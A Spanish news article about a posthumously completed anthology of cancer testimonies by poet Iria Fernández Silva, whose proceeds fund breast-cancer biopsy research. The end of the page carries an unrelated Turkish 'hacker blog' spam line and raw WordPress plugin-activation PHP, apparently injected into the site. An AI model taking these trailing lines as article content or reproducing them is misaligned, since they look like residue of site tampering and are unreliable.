Una luz encendida contra el cáncer


Ocurra lo que ocurra, aunque ocurra lo peor, algunos proyectos tienen que culminarse. Y eso hicieron los amigos de Iria Fernández Silva (O Barco de Valdeorras, 1981- Madrid 2020), que terminaron ‘Enciende una luz. Palabras desde el cáncer’, el libro en el que la poeta recogía los testimonios de personas que, como ella, se estaban enfrentando a esta enfermedad. Iria murió en abril de 2020, pero antes, encargó a su amiga Elena Arribas que lo terminase y lo publicarse. «Lo más valioso de este libro, más allá del talento literario, es que da voz a los propios enfermos, en medio de su proceso o una vez superado el cáncer, así como a los profesionales sanitarios, familiares y amigos que están o han estado lidiando con la enfermedad», cuenta Arribas.

‘Enciende una Luz. Palabras desde el Cáncer’ es un proyecto necesario para comprender cómo se vive cerca de la enfermedad y es, además, un abrazo para todas las personas que están, han estado y estarán cerca de él. Se calcula que una de cada ocho mujeres españolas tendrá un cáncer de mama en algún momento de su vida, es el más frecuente en la mujer en España y la primera causa de muerte por cáncer en nuestro país en las mujeres.

La editorial Lastura, que ha publicado el libro, destinará el 100% de la recaudación a la Fundación Intheos, para financiar el proyecto de biopsia líquida en cáncer de mama avanzado, uno de los últimos avances para identificar biomarcadores tumorales de forma más rápida y menos invasiva.

En la obra han participado 38 autores afectados por la enfermedad, entre los que hay poetas reconocidos como Marta Agudo, Chús Arellano, Olga Muñoz, Isabel Miguel o Ignacio Miranda, la dramaturga Carolina África y la músico Rakel G., quien ha compuesto una canción para la causa.

«El cáncer es sinónimo en muchas ocasiones de dolor, sufrimiento y muerte, pero también de abrazos y descubrimientos, de más amor y fuerza de la que nos creíamos capaces. Como dicen los autores de esta antología, el cáncer te hace sentir amor sin más, te enseña a esperar, te hace elegir la vida que damos por supuesta. Te enseña a vivir. Te das cuenta de que la mayoría de las veces solo puedes tender la mano; para ayudar o para que te ayuden. Esta antología pretende ser eso: una mano tendida», escribe Arribas en el prólogo de la obra.

‘Enciende una Luz. Palabras desde el Cáncer’ es también el punto de partida de un proyecto en el que están colaborando la Fundación Centro de Poesía José Hierro, la Asociación de Cáncer de Mama Metastásico y el IES Galileo Galilei, del que Iria, autora de los libros ‘Vivir es tu tarea’ (Ediciones Torremozas) y ‘Allí donde no ha’y (editado por El sastre de Apollinaire), era jefa de estudios.

Con esta iniciativa, «se trata de perpetuar los valores impulsados por la poeta: una persona vital, solidaria, entusiasta y sobre todo, siempre exhibiendo una gran sonrisa, aún en los peores momentos de su enfermedad», afirman los promotores.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );